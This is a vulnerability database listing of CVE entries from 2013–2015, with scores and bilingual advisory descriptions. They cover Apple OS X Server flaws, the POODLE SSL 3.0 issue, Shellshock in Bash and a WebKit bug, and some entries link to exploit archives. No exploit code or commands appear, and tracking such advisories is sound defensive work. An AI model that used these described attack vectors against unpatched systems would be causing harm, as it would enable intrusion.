CVSS: 7.5EPSS: 0%CPEs: 1EXPL: 0CVE-2015-1151
https://notcve.org/view.php?id=CVE-2015-1151
28 Apr 2015 — Wiki Server in Apple OS X Server before 4.1 allows remote attackers to bypass intended restrictions on Activity and People pages by connecting from an iPad client. Wiki Server en Apple OS X Server anterior a 4.1 permite a atacantes remotos evadir las restricciones sobre las páginas de actividad y de gente mediante la conexión desde un cliente de iPad. • http://lists.apple.com/archives/security-announce/2015/Apr/msg00006.html • CWE-284: Improper Access Control •
CVSS: 5.0EPSS: 0%CPEs: 1EXPL: 0CVE-2015-1150
https://notcve.org/view.php?id=CVE-2015-1150
28 Apr 2015 — The Firewall component in Apple OS X Server before 4.1 uses an incorrect pathname in configuration files, which allows remote attackers to bypass network-access restrictions by sending packets for which custom-rule blocking was intended. El componente Firewall en Apple OS X Server anterior a 4.1 utiliza un nombre de ruta incorrecto en los ficheros de configuración, lo que permite a atacantes remotos evadir las restricciones de acceso a red mediante el envío de paquetes para los cuales el bloqueo de la regla... • http://lists.apple.com/archives/security-announce/2015/Apr/msg00006.html • CWE-17: DEPRECATED: Code •
CVSS: 6.5EPSS: 0%CPEs: 1EXPL: 0CVE-2014-4446 – Apple Security Advisory 2014-10-16-3
https://notcve.org/view.php?id=CVE-2014-4446
17 Oct 2014 — Mail Service in Apple OS X Server before 4.0 does not enforce SACL changes until after a service restart, which allows remote authenticated users to bypass intended access restrictions in opportunistic circumstances by leveraging a change made by an administrator. Mail Service en Apple OS X Server anterior a 4.0 no fuerza cambios SACL hasta después de un reinicio de servicio, lo que permite a usuarios remotos autenticados evadir restricciones de acceso en circunstancias oportunistas mediante el aprovechamie... • http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html • CWE-264: Permissions, Privileges, and Access Controls •
CVSS: 5.5EPSS: 0%CPEs: 1EXPL: 0CVE-2014-4447 – Apple Security Advisory 2014-10-16-3
https://notcve.org/view.php?id=CVE-2014-4447
17 Oct 2014 — Profile Manager in Apple OS X Server before 4.0 allows local users to discover cleartext passwords by reading a file after a (1) profile setup or (2) profile edit occurs. Profile Manager en Apple OS X Server anterior a 4.0 permite a usuarios locales descubrir contraseñas en texto claro mediante la lectura de un fichero después de que ocurra una (1) configuración de perfil o (2) edición de perfil. OS X Server 4.0 is now available and addresses vulnerabilities in BIND, Wiki server, Xcode server, PostgreSQL, a... • http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html • CWE-310: Cryptographic Issues •
CVSS: 5.0EPSS: 94%CPEs: 147EXPL: 6CVE-2014-3566 – SSL/TLS Version Detection
https://notcve.org/view.php?id=CVE-2014-3566
15 Oct 2014 — The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue. El protocolo SSL 3.0, utilizado en OpenSSL hasta 1.0.1i y otros productos, utiliza relleno (padding) CBC no determinístico, lo que facilita a los atacantes man-in-the-middle obtener datos de texto plano a través de un ataque de relleno (padding) oracle, también conocid... • https://github.com/mikesplain/CVE-2014-3566-poodle-cookbook • CWE-298: Improper Validation of Certificate Expiration CWE-310: Cryptographic Issues CWE-319: Cleartext Transmission of Sensitive Information CWE-326: Inadequate Encryption Strength CWE-327: Use of a Broken or Risky Cryptographic Algorithm CWE-328: Use of Weak Hash CWE-757: Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade') •
CVSS: 10.0EPSS: 88%CPEs: 345EXPL: 23CVE-2014-7169 – GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
https://notcve.org/view.php?id=CVE-2014-7169
25 Sep 2014 — GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a ... • https://packetstorm.news/files/id/128650 • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CWE-228: Improper Handling of Syntactically Invalid Structure •
CVSS: 10.0EPSS: 94%CPEs: 345EXPL: 138CVE-2014-6271 – GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
https://notcve.org/view.php?id=CVE-2014-6271
24 Sep 2014 — GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." N... • https://packetstorm.news/files/id/181111 • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') •
CVSS: 9.8EPSS: 1%CPEs: 13EXPL: 0CVE-2014-4424 – Apple Security Advisory 2014-10-16-3
https://notcve.org/view.php?id=CVE-2014-4424
19 Sep 2014 — SQL injection vulnerability in Wiki Server in CoreCollaboration in Apple OS X Server before 2.2.3 and 3.x before 3.2.1 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. Vulnerabilidad de inyección SQL en Wiki Server en CoreCollaboration en Apple OS X Server anterior a 2.2.3 y 3.x anterior a 3.2.1 permite a atacantes remotos ejecutar comandos SQL arbitrarios a través de vectores no especificados. OS X Server 3.2.1 is now available and addresses arbitrary SQL execution, arbitr... • http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 6.1EPSS: 0%CPEs: 13EXPL: 0CVE-2014-4406 – Apple Security Advisory 2014-10-16-3
https://notcve.org/view.php?id=CVE-2014-4406
19 Sep 2014 — Cross-site scripting (XSS) vulnerability in Xcode Server in CoreCollaboration in Apple OS X Server before 3.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Vulnerabilidad de XSS en Xcode Server en CoreCollaboration en Apple OS X Server anterior a 3.2.1 permite a atacantes remotos inyectar secuencias de comandos web o HTML arbitrarios a través de vectores no especificados. OS X Server 3.2.1 is now available and addresses arbitrary SQL execution, arbitrary javascrip... • http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 8.8EPSS: 1%CPEs: 87EXPL: 0CVE-2013-0960 – Apple Security Advisory 2013-03-14-2
https://notcve.org/view.php?id=CVE-2013-0960
15 Mar 2013 — WebKit in Apple Safari before 6.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2013-0961. WebKit de Apple Safari anterior a v6.0.3 permite a atacantes remotos ejecutar código arbitrario o causar una denegación de servicio (corrupción de memoria) a través de un sitio web diseñado, una vulnerabilidad diferente a CVE-2013-0961. iTunes 11.0.3 is now available and addresses multiple vulnerabilities.... • http://lists.apple.com/archives/security-announce/2013/Mar/msg00003.html •